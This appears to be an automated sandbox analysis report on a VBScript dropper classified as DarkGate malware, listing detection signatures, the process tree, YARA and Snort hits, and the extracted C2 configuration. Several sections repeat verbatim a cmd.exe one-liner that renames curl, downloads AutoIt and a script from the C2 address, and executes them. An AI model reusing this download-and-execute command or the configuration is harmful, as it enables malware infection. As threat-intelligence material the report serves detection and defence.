Windows Analysis Report
1.vbs

Overview

General Information

Sample Name: 1.vbs
Analysis ID: 1313188
MD5: 317f213abccd88f7b240063e2bf9995d
SHA1: 66e0867a6f86fe25cf6773e58a8ff9ebb34fa36e
SHA256: 82e5409032e3d8d85390982fe99a86aa9f313f3c7b68c1e3fb4541d81fe9e24a
Tags: darkgatevbs

Detection

DarkGate
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Sigma detected: DarkGate
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Potential malicious VBS script found (suspicious strings)
Uses known network protocols on non-standard ports
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 5528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • bpzs.exe (PID: 6948 cmdline: bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • bpzs.exe (PID: 6852 cmdline: bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • Autoit3.exe (PID: 6116 cmdline: Autoit3.exe szkzjr.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  • cleanup
Name: DarkGate
Description: First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate
{"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
Yara matches (Source, Rule, Description, Author):
  • Source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Author: Joe Security
  • Source: 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Author: Joe Security
  • Source: 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Author: Joe Security
  • Source: Process Memory Space: Autoit3.exe PID: 6116, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
  • Source: Process Memory Space: Autoit3.exe PID: 6116, Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Author: Joe Security

Stealing of Sensitive Information

Source: Process started, Author: Joe Security
Data:
  Command: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3
  CommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\cmd.exe
  NewProcessName: C:\Windows\System32\cmd.exe
  OriginalFileName: C:\Windows\System32\cmd.exe
  ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs"
  ParentImage: C:\Windows\System32\wscript.exe
  ParentProcessId: 5528
  ParentProcessName: wscript.exe
  ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3
  ProcessId: 6764
  ProcessName: cmd.exe

Snort IDS alert:
  Timestamp: 09/23/23-08:02:03.355684
  Source IP: 94.228.169.143
  Destination IP: 192.168.2.3
  SID: 2048098
  Source Port: 2351
  Destination Port: 49713
  Protocol: TCP
  Classtype: A Network Trojan was detected

AV Detection

Source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: DarkGate {"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
Source: 1.vbs, Virustotal: Detection: 11%
Source: http://94.228.169.143:2351/msibpzszuqi, Virustotal: Detection: 6%
Source: http://94.228.169.143:2351/bpzszuqi, Virustotal: Detection: 6%
Source: C:\bpzs\bpzs.exe, Code function: 4_2_00007FF7F8D3FD00 CryptGetHashParam, CryptGetHashParam, CryptDestroyHash, CryptReleaseContext, 4_2_00007FF7F8D3FD00
Source: C:\bpzs\bpzs.exe, Code function: 4_2_00007FF7F8D3FCF0 CryptHashData, 4_2_00007FF7F8D3FCF0
Source: C:\bpzs\bpzs.exe, Code function: 4_2_00007FF7F8D3FCA0 CryptAcquireContextA, CryptCreateHash, 4_2_00007FF7F8D3FCA0
Source: C:\bpzs\bpzs.exe, Code function: 4_2_00007FF7F8D2486C CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, CryptReleaseContext, 4_2_00007FF7F8D2486C